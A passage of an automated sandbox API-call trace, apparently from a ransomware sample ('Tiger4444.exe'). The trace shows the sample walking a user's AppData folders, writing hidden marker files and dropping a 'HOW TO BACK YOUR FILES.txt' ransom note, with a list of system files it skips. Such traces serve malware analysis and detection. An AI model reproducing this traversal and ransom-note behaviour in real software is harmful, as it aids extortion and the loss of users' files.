files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2ac [0052.263] CreateFileMappingW (hFile=0x2ac, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x2c8 [0052.264] MapViewOfFile (hFileMappingObject=0x2c8, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0xbe0000 [0052.264] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0052.264] CloseHandle (hObject=0x2c8) returned 1 [0052.264] CloseHandle (hObject=0x2ac) returned 1 [0052.264] GetCurrentThreadId () returned 0xfa8 [0052.264] RtlInterlockedPopEntrySList (in: ListHead=0xc66828 | out: ListHead=0xc66828) returned 0xc916d0 [0052.264] lstrcpynW (in: lpString1=0x30aeaa8, lpString2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\Certificates", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\Certificates") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\Certificates" [0052.264] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc61df8 | out: hHeap=0xc50000) returned 1 [0052.264] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc916c8 | out: hHeap=0xc50000) returned 1 [0052.264] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\Certificates" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\Certificates") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\Certificates" [0052.264] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\Certificates", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\Certificates\\") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\Certificates\\" [0052.264] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\Certificates\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\Certificates\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\Certificates\\.BFC0E91B00AE8A0620D3" [0052.264] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\Certificates\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\systemcertificates\\my\\certificates\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x2ac [0052.265] WriteFile (in: hFile=0x2ac, lpBuffer=0xc708ac*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x30aca68, lpOverlapped=0x0 | out: lpBuffer=0xc708ac*, lpNumberOfBytesWritten=0x30aca68*=0x3d4, lpOverlapped=0x0) returned 1 [0052.267] FlushFileBuffers (hFile=0x2ac) returned 1 [0052.268] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\Certificates\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0052.268] CloseHandle (hObject=0x2ac) returned 1 [0052.268] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\Certificates") returned 76 [0052.268] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0052.268] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\Certificates\\*", lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x62a3729f, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0xd3b6c131, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x842babe0, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xc72d48 [0052.269] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0052.269] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0052.269] lstrcmpiW (lpString1=".", lpString2="Tiger4444.exe") returned -1 [0052.269] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0052.269] FindNextFileW (in: hFindFile=0xc72d48, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x62a3729f, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0xd3b6c131, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x842babe0, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0052.269] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0052.269] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0052.269] lstrcmpiW (lpString1="..", lpString2="Tiger4444.exe") returned -1 [0052.269] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0052.269] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0052.269] FindNextFileW (in: hFindFile=0xc72d48, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0x842babe0, ftCreationTime.dwHighDateTime=0x1d50d44, ftLastAccessTime.dwLowDateTime=0x842babe0, ftLastAccessTime.dwHighDateTime=0x1d50d44, ftLastWriteTime.dwLowDateTime=0x842babe0, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0052.269] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0052.269] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0052.269] FindNextFileW (in: hFindFile=0xc72d48, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0x842babe0, ftCreationTime.dwHighDateTime=0x1d50d44, ftLastAccessTime.dwLowDateTime=0x842babe0, ftLastAccessTime.dwHighDateTime=0x1d50d44, ftLastWriteTime.dwLowDateTime=0x842babe0, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 0 [0052.269] FindClose (in: hFindFile=0xc72d48 | out: hFindFile=0xc72d48) returned 1 [0052.269] lstrcpyW (in: lpString1=0x30aeb42, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0052.269] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\Certificates\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\systemcertificates\\my\\certificates\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2ac [0052.269] CreateFileMappingW (hFile=0x2ac, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x2c8 [0052.269] MapViewOfFile (hFileMappingObject=0x2c8, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0xbe0000 [0052.270] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0052.270] CloseHandle (hObject=0x2c8) returned 1 [0052.270] CloseHandle (hObject=0x2ac) returned 1 [0052.270] GetCurrentThreadId () returned 0xfa8 [0052.270] RtlInterlockedPopEntrySList (in: ListHead=0xc66828 | out: ListHead=0xc66828) returned 0xc91510 [0052.270] lstrcpynW (in: lpString1=0x30aeaa8, lpString2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Stationery", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Stationery") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Stationery" [0052.270] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc89860 | out: hHeap=0xc50000) returned 1 [0052.270] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc91508 | out: hHeap=0xc50000) returned 1 [0052.270] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Stationery" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Stationery") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Stationery" [0052.270] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Stationery", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Stationery\\") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Stationery\\" [0052.270] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Stationery\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Stationery\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Stationery\\.BFC0E91B00AE8A0620D3" [0052.270] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Stationery\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\stationery\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x2ac [0052.272] WriteFile (in: hFile=0x2ac, lpBuffer=0xc708ac*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x30aca68, lpOverlapped=0x0 | out: lpBuffer=0xc708ac*, lpNumberOfBytesWritten=0x30aca68*=0x3d4, lpOverlapped=0x0) returned 1 [0052.274] FlushFileBuffers (hFile=0x2ac) returned 1 [0052.275] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Stationery\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0052.276] CloseHandle (hObject=0x2ac) returned 1 [0052.276] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Stationery") returned 52 [0052.276] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0052.276] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Stationery\\*", lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd38d4b92, ftCreationTime.dwHighDateTime=0x1d327c8, ftLastAccessTime.dwLowDateTime=0xd38d4b92, ftLastAccessTime.dwHighDateTime=0x1d327c8, ftLastWriteTime.dwLowDateTime=0x842babe0, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xc73108 [0052.276] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0052.276] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0052.276] lstrcmpiW (lpString1=".", lpString2="Tiger4444.exe") returned -1 [0052.277] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0052.277] FindNextFileW (in: hFindFile=0xc73108, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd38d4b92, ftCreationTime.dwHighDateTime=0x1d327c8, ftLastAccessTime.dwLowDateTime=0xd38d4b92, ftLastAccessTime.dwHighDateTime=0x1d327c8, ftLastWriteTime.dwLowDateTime=0x842babe0, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0052.277] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0052.277] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0052.277] lstrcmpiW (lpString1="..", lpString2="Tiger4444.exe") returned -1 [0052.277] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0052.277] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0052.277] FindNextFileW (in: hFindFile=0xc73108, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0x842babe0, ftCreationTime.dwHighDateTime=0x1d50d44, ftLastAccessTime.dwLowDateTime=0x842babe0, ftLastAccessTime.dwHighDateTime=0x1d50d44, ftLastWriteTime.dwLowDateTime=0x842e0e47, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0052.277] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0052.277] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0052.277] FindNextFileW (in: hFindFile=0xc73108, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0x842babe0, ftCreationTime.dwHighDateTime=0x1d50d44, ftLastAccessTime.dwLowDateTime=0x842babe0, ftLastAccessTime.dwHighDateTime=0x1d50d44, ftLastWriteTime.dwLowDateTime=0x842e0e47, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 0 [0052.277] FindClose (in: hFindFile=0xc73108 | out: hFindFile=0xc73108) returned 1 [0052.277] lstrcpyW (in: lpString1=0x30aeb12, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0052.277] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Stationery\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\stationery\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2ac [0052.278] CreateFileMappingW (hFile=0x2ac, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x2c8 [0052.278] MapViewOfFile (hFileMappingObject=0x2c8, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0xbe0000 [0052.278] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0052.279] CloseHandle (hObject=0x2c8) returned 1 [0052.279] CloseHandle (hObject=0x2ac) returned 1 [0052.279] GetCurrentThreadId () returned 0xfa8 [0052.279] RtlInterlockedPopEntrySList (in: ListHead=0xc66828 | out: ListHead=0xc66828) returned 0xc91570 [0052.279] lstrcpynW (in: lpString1=0x30aeaa8, lpString2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Speech", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Speech") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Speech" [0052.279] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc5fd80 | out: hHeap=0xc50000) returned 1 [0052.279] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc91568 | out: hHeap=0xc50000) returned 1 [0052.279] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Speech" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Speech") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Speech" [0052.279] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Speech", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Speech\\") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Speech\\" [0052.279] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Speech\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Speech\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Speech\\.BFC0E91B00AE8A0620D3" [0052.279] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Speech\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\speech\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x2ac [0052.292] WriteFile (in: hFile=0x2ac, lpBuffer=0xc708ac*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x30aca68, lpOverlapped=0x0 | out: lpBuffer=0xc708ac*, lpNumberOfBytesWritten=0x30aca68*=0x3d4, lpOverlapped=0x0) returned 1 [0052.294] FlushFileBuffers (hFile=0x2ac) returned 1 [0052.295] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Speech\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0052.295] CloseHandle (hObject=0x2ac) returned 1 [0052.296] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Speech") returned 48 [0052.296] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0052.296] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Speech\\*", lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7161656c, ftCreationTime.dwHighDateTime=0x1d327c9, ftLastAccessTime.dwLowDateTime=0xe2954bc8, ftLastAccessTime.dwHighDateTime=0x1d336d6, ftLastWriteTime.dwLowDateTime=0x842e0e47, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xc72ec8 [0052.296] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0052.296] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0052.296] lstrcmpiW (lpString1=".", lpString2="Tiger4444.exe") returned -1 [0052.296] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0052.296] FindNextFileW (in: hFindFile=0xc72ec8, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7161656c, ftCreationTime.dwHighDateTime=0x1d327c9, ftLastAccessTime.dwLowDateTime=0xe2954bc8, ftLastAccessTime.dwHighDateTime=0x1d336d6, ftLastWriteTime.dwLowDateTime=0x842e0e47, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0052.296] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0052.296] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0052.296] lstrcmpiW (lpString1="..", lpString2="Tiger4444.exe") returned -1 [0052.296] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0052.296] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0052.296] FindNextFileW (in: hFindFile=0xc72ec8, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0x842e0e47, ftCreationTime.dwHighDateTime=0x1d50d44, ftLastAccessTime.dwLowDateTime=0x842e0e47, ftLastAccessTime.dwHighDateTime=0x1d50d44, ftLastWriteTime.dwLowDateTime=0x843070bf, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0052.296] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0052.296] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0052.296] FindNextFileW (in: hFindFile=0xc72ec8, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe2954bc8, ftCreationTime.dwHighDateTime=0x1d336d6, ftLastAccessTime.dwLowDateTime=0xe2954bc8, ftLastAccessTime.dwHighDateTime=0x1d336d6, ftLastWriteTime.dwLowDateTime=0xe2954bc8, ftLastWriteTime.dwHighDateTime=0x1d336d6, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Files", cAlternateFileName="")) returned 1 [0052.296] lstrcmpiW (lpString1="Files", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0052.296] lstrcmpiW (lpString1="Files", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0052.296] lstrcmpiW (lpString1="Files", lpString2="Tiger4444.exe") returned -1 [0052.296] lstrcmpiW (lpString1="Files", lpString2=".") returned 1 [0052.296] lstrcmpiW (lpString1="Files", lpString2="..") returned 1 [0052.296] lstrcmpiW (lpString1="Files", lpString2="windows") returned -1 [0052.296] lstrcmpiW (lpString1="Files", lpString2="bootmgr") returned 1 [0052.297] lstrcmpiW (lpString1="Files", lpString2="pagefile.sys") returned -1 [0052.297] lstrcmpiW (lpString1="Files", lpString2="boot") returned 1 [0052.297] lstrcmpiW (lpString1="Files", lpString2="ids.txt") returned -1 [0052.297] lstrcmpiW (lpString1="Files", lpString2="NTUSER.DAT") returned -1 [0052.297] lstrcpyW (in: lpString1=0x30aeb0a, lpString2="Files" | out: lpString1="Files") returned="Files" [0052.297] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x13) returned 0xc913a8 [0052.297] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x6e) returned 0xc89770 [0052.297] RtlInterlockedPushEntrySList (in: ListHead=0xc66828, ListEntry=0xc913b0 | out: ListHead=0xc66828, ListEntry=0xc913b0) returned 0xc91490 [0052.297] FindNextFileW (in: hFindFile=0xc72ec8, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe2954bc8, ftCreationTime.dwHighDateTime=0x1d336d6, ftLastAccessTime.dwLowDateTime=0xe2954bc8, ftLastAccessTime.dwHighDateTime=0x1d336d6, ftLastWriteTime.dwLowDateTime=0xe2954bc8, ftLastWriteTime.dwHighDateTime=0x1d336d6, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Files", cAlternateFileName="")) returned 0 [0052.297] FindClose (in: hFindFile=0xc72ec8 | out: hFindFile=0xc72ec8) returned 1 [0052.297] lstrcpyW (in: lpString1=0x30aeb0a, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0052.297] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Speech\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\speech\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2ac [0052.297] CreateFileMappingW (hFile=0x2ac, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x2c8 [0052.297] MapViewOfFile (hFileMappingObject=0x2c8, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0xbe0000 [0052.298] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0052.298] CloseHandle (hObject=0x2c8) returned 1 [0052.298] CloseHandle (hObject=0x2ac) returned 1 [0052.298] GetCurrentThreadId () returned 0xfa8 [0052.298] RtlInterlockedPopEntrySList (in: ListHead=0xc66828 | out: ListHead=0xc66828) returned 0xc913b0 [0052.298] lstrcpynW (in: lpString1=0x30aeaa8, lpString2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Speech\\Files", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Speech\\Files") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Speech\\Files" [0052.298] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc89770 | out: hHeap=0xc50000) returned 1 [0052.298] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc913a8 | out: hHeap=0xc50000) returned 1 [0052.298] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Speech\\Files" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Speech\\Files") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Speech\\Files" [0052.298] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Speech\\Files", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Speech\\Files\\") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Speech\\Files\\" [0052.298] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Speech\\Files\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Speech\\Files\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Speech\\Files\\.BFC0E91B00AE8A0620D3" [0052.298] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Speech\\Files\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\speech\\files\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, 